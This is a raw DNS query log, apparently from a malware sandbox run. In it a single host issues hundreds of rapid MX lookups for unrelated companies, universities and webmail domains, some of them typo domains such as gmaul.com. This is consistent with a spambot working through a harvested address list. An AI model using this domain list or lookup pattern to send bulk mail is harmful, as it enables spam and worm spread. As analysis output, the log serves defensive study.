                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.687271118 CEST192.168.2.3192.31.80.300x4c0fStandard query (0)oswego.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.687680006 CEST192.168.2.3156.154.124.650x4c0fStandard query (0)1thecity.bizMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.688186884 CEST192.168.2.3199.9.14.2010x4c0fStandard query (0)prodigy.net.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.688530922 CEST192.168.2.3192.12.94.300x4c0fStandard query (0)foodallergy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.688916922 CEST192.168.2.3192.31.80.300x4c0fStandard query (0)sonic.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.700365067 CEST192.168.2.3192.12.94.300x5b0fStandard query (0)markerman.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.700941086 CEST192.168.2.3192.31.80.300x5b0fStandard query (0)hamnail.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.701441050 CEST192.168.2.3192.12.94.300x5b0fStandard query (0)travelpack.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.701946974 CEST192.168.2.3192.12.94.300x5b0fStandard query (0)pettigna.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.702356100 CEST192.168.2.3198.41.0.40x5b0fStandard query (0)auchan.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.702846050 CEST192.168.2.3192.12.94.300x5b0fStandard query (0)metro-trust.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.703380108 CEST192.168.2.3185.159.196.20x5b0fStandard query (0)taxperts.on.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.703835011 CEST192.168.2.3202.12.27.330x5b0fStandard query (0)nn.hrMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.704211950 CEST192.168.2.3192.12.94.300x5b0fStandard query (0)logicify.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.704581976 CEST192.168.2.3192.12.94.300x5b0fStandard query (0)williamsanderson.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.715959072 CEST192.168.2.3192.12.94.300x6b0fStandard query (0)hughes.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.716286898 CEST192.168.2.3199.9.14.2010x6b0fStandard query (0)evoe.euMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.716734886 CEST192.168.2.345.142.220.390x6b0fStandard query (0)coreconsulting.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.717221022 CEST192.168.2.3192.12.94.300x6b0fStandard query (0)idealtile.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.717915058 CEST192.168.2.3192.31.80.300x6b0fStandard query (0)peoplescom.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.718225956 CEST192.168.2.3199.19.56.10x6b0fStandard query (0)illinoisalumni.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.718734026 CEST192.168.2.3192.12.94.300x6b0fStandard query (0)ukg.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.719221115 CEST192.168.2.3192.12.94.300x6b0fStandard query (0)axa-im.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.719923973 CEST192.168.2.3192.12.94.300x6b0fStandard query (0)trinom.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.720271111 CEST192.168.2.3192.12.94.300x6b0fStandard query (0)easybuygos.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.732048988 CEST192.168.2.3199.19.56.10x7b0fStandard query (0)bvcaa.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.733253002 CEST192.168.2.3192.12.94.300x7b0fStandard query (0)glasslam-asia.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.734580994 CEST192.168.2.3192.12.94.300x7b0fStandard query (0)resumesrv.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.735470057 CEST192.168.2.3192.12.94.300x7b0fStandard query (0)gsl-th.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.735985994 CEST192.168.2.3192.12.94.300x7b0fStandard query (0)comstarauto.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.736351013 CEST192.168.2.3192.12.94.300x7b0fStandard query (0)gmaul.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.736735106 CEST192.168.2.365.22.196.10x7b0fStandard query (0)netoverdrive.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.737206936 CEST192.168.2.3192.12.94.300x7b0fStandard query (0)victoryconnect.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.737732887 CEST192.168.2.3192.12.94.300x7b0fStandard query (0)tivejo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.742705107 CEST192.168.2.3192.12.94.300x7b0fStandard query (0)torba.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.747397900 CEST192.168.2.3192.12.94.300x8a0fStandard query (0)vixmalls.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.747761011 CEST192.168.2.3192.12.94.300x8a0fStandard query (0)sequere.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.748080015 CEST192.168.2.3192.12.94.300x8a0fStandard query (0)oulook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.748425961 CEST192.168.2.3192.31.80.300x8a0fStandard query (0)tc-sm.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.748833895 CEST192.168.2.3192.12.94.300x8a0fStandard query (0)gmaul.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.749119997 CEST192.168.2.3192.58.128.300x8a0fStandard query (0)4mail.topMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.749768019 CEST192.168.2.3192.12.94.300x8a0fStandard query (0)morganlewis.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.749806881 CEST192.168.2.3192.31.80.300x8a0fStandard query (0)paragon-are.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.750190973 CEST192.168.2.3192.12.94.300x8a0fStandard query (0)vishalmangalwadi.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.750550032 CEST192.168.2.3192.12.94.300x8a0fStandard query (0)pullman.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.763178110 CEST192.168.2.3192.12.94.300x9a0fStandard query (0)spetema.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.764854908 CEST192.168.2.345.142.220.390x9a0fStandard query (0)virglio.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.766891003 CEST192.168.2.3192.12.94.300x9a0fStandard query (0)choice-furniture.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.768742085 CEST192.168.2.3192.12.94.300x9a0fStandard query (0)gmaul.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.774933100 CEST192.168.2.3192.12.94.300x9a0fStandard query (0)gwyneddwealthpartners.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.775563955 CEST192.168.2.3192.12.94.300x9a0fStandard query (0)miles.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.775940895 CEST192.168.2.3192.12.94.300x9a0fStandard query (0)new-purse.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.776294947 CEST192.168.2.3192.12.94.300x9a0fStandard query (0)hotmmai.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.776770115 CEST192.168.2.3192.36.148.170x9a0fStandard query (0)24.com.esMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.777328968 CEST192.168.2.3192.12.94.300x9a0fStandard query (0)eamil.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.778697968 CEST192.168.2.31.1.1.10x14f5Standard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.794235945 CEST192.168.2.3192.12.94.300xb90fStandard query (0)plantasmediterraneas.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.794780970 CEST192.168.2.3198.97.190.530xb90fStandard query (0)zippymail.infoMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.795284033 CEST192.168.2.345.142.220.390xb90fStandard query (0)conceriacaponigiuseppe.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.795834064 CEST192.168.2.3192.12.94.300xb90fStandard query (0)meta-lab.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.796344995 CEST192.168.2.3192.12.94.300xb90fStandard query (0)gmaiul.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.796855927 CEST192.168.2.3192.31.80.300xb90fStandard query (0)sgcm.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.797250032 CEST192.168.2.3192.12.94.300xb90fStandard query (0)fallsburgny.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.797681093 CEST192.168.2.3194.0.14.10xb90fStandard query (0)napismi.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.798077106 CEST192.168.2.3192.31.80.300xb90fStandard query (0)nomatech.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.798531055 CEST192.168.2.3194.0.14.10xb90fStandard query (0)kudrlicka.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.809870958 CEST192.168.2.3192.12.94.300xc90fStandard query (0)mouseclicker.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.810468912 CEST192.168.2.3192.12.94.300xc90fStandard query (0)jardiland.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.810978889 CEST192.168.2.3194.0.14.10xc90fStandard query (0)2max.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.811379910 CEST192.168.2.3192.12.94.300xc90fStandard query (0)quest-global.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.811901093 CEST192.168.2.3194.0.14.10xc90fStandard query (0)ocel.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.812247992 CEST192.168.2.3192.31.80.300xc90fStandard query (0)socket.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.812614918 CEST192.168.2.3192.12.94.300xc90fStandard query (0)networkvenezuela.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.812978029 CEST192.168.2.3192.12.94.300xc90fStandard query (0)romao.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.813664913 CEST192.168.2.3192.12.94.300xc90fStandard query (0)hotpop.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.813664913 CEST192.168.2.3192.12.94.300xc90fStandard query (0)eindia.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.825937033 CEST192.168.2.3192.12.94.300xd80fStandard query (0)vladuz.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.826386929 CEST192.168.2.3193.176.144.220xd80fStandard query (0)linder.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.827168941 CEST192.168.2.3192.12.94.300xd80fStandard query (0)adler-lacke.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.827548981 CEST192.168.2.3194.0.14.10xd80fStandard query (0)cbox.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.828634977 CEST192.168.2.3192.12.94.300xd80fStandard query (0)gunit.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.829226017 CEST192.168.2.3192.12.94.300xd80fStandard query (0)uber.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.829658985 CEST192.168.2.3192.12.94.300xd80fStandard query (0)bisok.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.830029011 CEST192.168.2.3192.12.94.300xd80fStandard query (0)ellusions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.830651045 CEST192.168.2.3192.31.80.300xd80fStandard query (0)tanya.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.830887079 CEST192.168.2.3192.12.94.300xd80fStandard query (0)moakt.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.841001034 CEST192.168.2.3202.12.27.330xe80fStandard query (0)orcon.net.nzMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.841532946 CEST192.168.2.3192.12.94.300xe80fStandard query (0)lianhuistone.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.842035055 CEST192.168.2.3185.159.196.20xe80fStandard query (0)tph.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.842530012 CEST192.168.2.3199.19.56.10xe80fStandard query (0)asl.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.843509912 CEST192.168.2.3192.12.94.300xe80fStandard query (0)icoud.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.843993902 CEST192.168.2.345.142.220.390xe80fStandard query (0)soluzioni-sw.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.844419956 CEST192.168.2.3192.12.94.300xe80fStandard query (0)oulook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.844773054 CEST192.168.2.3195.243.137.260xe80fStandard query (0)nsbuechner.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.845221996 CEST192.168.2.3192.12.94.300xe80fStandard query (0)2980.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.921401978 CEST192.168.2.31.1.1.10x7cdbStandard query (0)hasslo.ns.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.087208986 CEST192.168.2.3108.162.195.1340x1111Standard query (0)wallstreetinstitute.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.090960979 CEST192.168.2.354.161.68.150x2011Standard query (0)tvcskyshop.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.138377905 CEST192.168.2.3185.85.196.360x4f11Standard query (0)karamian.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.139272928 CEST192.168.2.31.1.1.10x1836Standard query (0)dns1.intnet.muA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.419806957 CEST192.168.2.31.1.1.10xbe6Standard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.502398014 CEST192.168.2.31.1.1.10x6dfeStandard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.606858969 CEST192.168.2.3202.123.2.60x6313Standard query (0)mauritiustelecom.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.607462883 CEST192.168.2.31.1.1.10x4cb5Standard query (0)nsn1.mijndomein.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.642246008 CEST192.168.2.31.1.1.10x23faStandard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.837230921 CEST192.168.2.31.1.1.10xe613Standard query (0)www.muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.871637106 CEST192.168.2.3156.154.64.1070xab14Standard query (0)denbiggelaar.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.872874975 CEST192.168.2.3162.159.26.2170xba14Standard query (0)lakecountryacademy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.873280048 CEST192.168.2.3204.74.108.2470xba14Standard query (0)touchmarknb.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.404345036 CEST192.168.2.3192.33.4.120x1c17Standard query (0)eriksminde.dkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.424082041 CEST192.168.2.3192.12.94.300x2b17Standard query (0)gyn.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.424082041 CEST192.168.2.3192.12.94.300x2b17Standard query (0)send.aweber.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.425168037 CEST192.168.2.3192.31.80.300x2b17Standard query (0)ftc-i.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.426301003 CEST192.168.2.3192.12.94.300x2b17Standard query (0)barracuda.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.428703070 CEST192.168.2.345.142.220.390x2b17Standard query (0)pec.vittoriaassicurazioni.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.429989100 CEST192.168.2.3192.12.94.300x2b17Standard query (0)leva.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.429989100 CEST192.168.2.3192.12.94.300x2b17Standard query (0)gmfi.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.430947065 CEST192.168.2.3156.154.132.2000x2b17Standard query (0)xoxy.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.430948973 CEST192.168.2.3192.12.94.300x2b17Standard query (0)ipsolutionz.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.432099104 CEST192.168.2.3185.159.196.20x2b17Standard query (0)thehealthline.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.436883926 CEST192.168.2.3199.19.56.10x3b17Standard query (0)cartadelapau.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.437932014 CEST192.168.2.3192.12.94.300x3b17Standard query (0)acquitygroup.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.438786983 CEST192.168.2.3156.154.100.30x3b17Standard query (0)hertspartsft.nhs.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.439254045 CEST192.168.2.3192.12.94.300x3b17Standard query (0)iutlook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.440088987 CEST192.168.2.31.1.1.10x51eaStandard query (0)ns2.centrum.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.605581999 CEST192.168.2.393.185.103.1910xd717Standard query (0)cbox.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.606452942 CEST192.168.2.3199.19.56.10xd717Standard query (0)reaganfoundation.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.607300043 CEST192.168.2.3192.31.80.300xe717Standard query (0)mepotelco.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.607601881 CEST192.168.2.3194.169.218.540xe717Standard query (0)webtempmail.onlineMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.608119011 CEST192.168.2.3192.12.94.300xe717Standard query (0)zeiss.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.609630108 CEST192.168.2.3194.0.6.10xe717Standard query (0)sabca.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.622498989 CEST192.168.2.3192.12.94.300xf617Standard query (0)svdc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.623255968 CEST192.168.2.3192.12.94.300xf617Standard query (0)terradoliva.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.623635054 CEST192.168.2.3198.41.0.40xf617Standard query (0)voiaj.mdMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.624428988 CEST192.168.2.3192.12.94.300xf617Standard query (0)weber-metaux.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.624859095 CEST192.168.2.3192.12.94.300xf617Standard query (0)reuters.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.625691891 CEST192.168.2.3192.12.94.300xf617Standard query (0)swc-tx.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.625691891 CEST192.168.2.3192.12.94.300xf617Standard query (0)pfleuger.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.626169920 CEST192.168.2.3192.12.94.300xf617Standard query (0)cyberforma.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.626701117 CEST192.168.2.3199.19.56.10xf617Standard query (0)mc708.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.627182961 CEST192.168.2.3192.12.94.300xf617Standard query (0)epilla.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.638384104 CEST192.168.2.3192.12.94.300x618Standard query (0)gocsc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.638406038 CEST192.168.2.345.142.220.390x618Standard query (0)hotmai.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.639249086 CEST192.168.2.3192.31.80.300x618Standard query (0)tabbi.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.639272928 CEST192.168.2.345.142.220.390x618Standard query (0)uniroma2.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.640018940 CEST192.168.2.3161.53.160.1000x618Standard query (0)sedmasekunda.hrMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.640244961 CEST192.168.2.3199.19.56.10x618Standard query (0)ryico.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.640813112 CEST192.168.2.3192.36.148.170x618Standard query (0)rcm.atMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.641283989 CEST192.168.2.3192.31.80.300x618Standard query (0)ebtnet.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.641865969 CEST192.168.2.3194.69.254.10x618Standard query (0)unav.esMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.642358065 CEST192.168.2.3192.12.94.300x618Standard query (0)wolfeborobible.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.653911114 CEST192.168.2.3192.12.94.300x1618Standard query (0)p-per.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.654476881 CEST192.168.2.3185.159.196.20x1618Standard query (0)cbdn.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.654964924 CEST192.168.2.345.142.220.390x1618Standard query (0)uniparthenope.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.655484915 CEST192.168.2.3192.12.94.300x1618Standard query (0)vivify.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.657221079 CEST192.168.2.3192.12.94.300x1618Standard query (0)cargill.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.747560024 CEST192.168.2.3173.201.75.480x7318Standard query (0)botters.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.748326063 CEST192.168.2.31.1.1.10x1d43Standard query (0)ns2.centralnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.906589985 CEST192.168.2.31.1.1.10x7d3fStandard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.914764881 CEST192.168.2.3185.24.64.100x6d19Standard query (0)fletchers.uk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.951709986 CEST192.168.2.380.247.239.40x9c19Standard query (0)vivreeco.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.965951920 CEST192.168.2.397.74.99.640xac19Standard query (0)thenews.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.966454029 CEST192.168.2.3156.154.130.1000xac19Standard query (0)ccamatil.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.967019081 CEST192.168.2.313.107.236.80xac19Standard query (0)pcl.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:32.967849970 CEST192.168.2.381.19.33.20xac19Standard query (0)lanskroun.czMX (Mail exchange)IN (0x0001)false
